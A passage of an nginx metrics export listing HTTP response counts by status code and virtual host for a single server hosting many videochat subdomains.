nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tsgzrsco.videochat.mx"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tsprruevdbte.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tswyino.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tsxnphe.videochat.mx"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.cafe"} 3613 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.date"} 1033 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.mx"} 6333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.show"} 749 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.tv.br"} 2615 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.world"} 2248 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="twaxolo.videochat.mx"} 101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uavnrde.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.cafe"} 2148 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.date"} 691 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.mx"} 6117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.show"} 406 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.tv.br"} 2258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.world"} 2549 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uevdbte.videochat.mx"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.cafe"} 2419 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.date"} 4386 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.mx"} 7060 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.show"} 779 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.tv.br"} 3230 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.world"} 2860 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ukfybkk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="umuyham.videochat.mx"} 122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="unleashed.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.cafe"} 1915 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.date"} 805 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.mx"} 7618 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.show"} 491 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.tv.br"} 2577 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.world"} 3114 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="usavbchm.videochat.mx"} 1036 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uvdbouz.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uxoskmy.videochat.mx"} 309 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.cafe"} 2402 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.date"} 1121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.mx"} 7927 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.show"} 373 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.tv.br"} 3339 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.world"} 5378 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uzjrval.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uzuvnis.videochat.mx"} 114 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="v.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vawuuur.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vaylimn.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vbmqkckupris.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vdqcuyi.videochat.mx"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="veevuga.videochat.mx"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.cafe"} 2152 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.date"} 1287 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.mx"} 6813 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.show"} 295 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.tv.br"} 1762 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.world"} 2411 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.cafe"} 24500 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.date"} 24111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.mx"} 37711 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.show"} 20661 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.tv.br"} 39836 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.world"} 35404 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="visionsoult.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vkqwqvpmfscy.videochat.mx"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vksvfmr.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vmi460104.contaboserver.net"} 15417 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vmi460104.contaboserver.net:80"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vnhggbn.videochat.mx"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vpmfscy.videochat.mx"} 615 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vzknpzh.videochat.mx"} 209 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="w8wmixrekc.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="waddusldhw.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="waqqvxh.videochat.mx"} 281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="webmail.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="whuinar.videochat.mx"} 426 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="whxqusco.videochat.mx"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wipnbpt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wjftnkk.videochat.mx"} 317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wmiqjupdanpt.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wngqune.videochat.mx"} 560 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wohmskm.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wordpress.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wp.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wrozblo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wwswnaz.videochat.mx"} 672 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.bsncdn.org"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.c14.co.il"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.ee.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.fdzhb.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.google.com"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.he.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.iranintl.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.linlangxiazi.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.lv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.mi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.my.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.pornhub.com"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.pt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.s1v7n3w5g.vip:9527"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.tryidc.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.cafe"} 3604 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.date"} 3607 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.mx"} 6955 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.show"} 1833 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.tv.br"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.world"} 4669 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xblqbkn.videochat.mx"} 110 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xbobmit.videochat.mx"} 111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xbodfbs.videochat.mx"} 381 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xexujsw.shop"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xfppyth.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xgyvqlo.videochat.mx"} 695 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.cafe"} 1870 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.date"} 700 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.mx"} 8691 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.show"} 424 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.tv.br"} 2780 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.world"} 5468 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xicipcrvyobs.videochat.mx"} 248 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xngalzycbazrhffuzjrval.videochat.mx"} 172 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xnsplzh.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xsjzfmi.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xvaqpeo.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xztqyzh.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xzxksro.videochat.mx"} 180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="y2.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ybifrit.videochat.mx"} 605 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ycgaupt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ycllmcs.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ydvzjhr.videochat.mx"} 570 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yfhzjyi.videochat.mx"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yfutyaz.videochat.mx"} 283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.cafe"} 2947 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.date"} 2698 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.mx"} 6099 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.show"} 424 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.tv.br"} 6058 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.world"} 2345 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yiceklv.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ykmflzh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ymwkrsi.videochat.mx"} 302 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yrsjwka.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ysxutfskyuka.videochat.mx"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yudawam.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ywmnhmrj.videochat.mx"} 395 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yzozfpbszvar.videochat.mx"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="z21yjuddiv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="z9cbyhzq8t.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zdchomr.videochat.mx"} 613 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zdkfdnl.videochat.mx"} 239 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.cafe"} 2063 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.date"} 5064 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.mx"} 8288 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.show"} 828 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.tv.br"} 2001 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.world"} 2521 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zhgeabg.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zmhblfceameo.videochat.mx"} 189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zplieen.videochat.mx"} 176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zqrrnit.videochat.mx"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zqtfbuk.videochat.mx"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zrhffuzjrval.videochat.mx"} 81 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ztpbram.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zxjzggl.videochat.mx"} 423 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zycbazrhffuzjrval.videochat.mx"} 140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zzgoelo.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="408",vhost="-"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="414",vhost="-"} 3924 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="127.0.0.1:80"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="127.0.0.1:8080"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="14fc525b-13a8-40c3-8f05-01cd06b04453.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="158.94.208.27"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="161.97.120.25"} 413 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="161.97.120.25:80"} 198 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="25.120.97.161:80"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="8115dadb-0b6b-4cca-ac37-a5cf02c05ca9.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="8f76d726-154f-4e15-83cf-3f4903a60b07.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="aaexebs.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="admin.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.tv.br"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.world"} 367 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.cafe"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.tv.br"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.world"} 130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.tv.br"} 233 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.world"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="api.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="app.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.cafe"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.date"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.mx"} 171 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.tv.br"} 189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.world"} 117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.tv.br"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.world"} 211 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="azecuhi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.tv.br"} 1014 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="backend.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.mx"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.tv.br"} 302 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.world"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.cafe"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.tv.br"} 147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.world"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.tv.br"} 178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.world"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.show"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.world"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bwfzopl.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.cafe"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.world"} 278 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.cafe"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.tv.br"} 278 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.world"} 238 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.cafe"} 92 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.date"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.tv.br"} 480 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ckdbbet.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cloijsk.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.cafe"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.tv.br"} 276 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.world"} 250 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.cafe"} 54 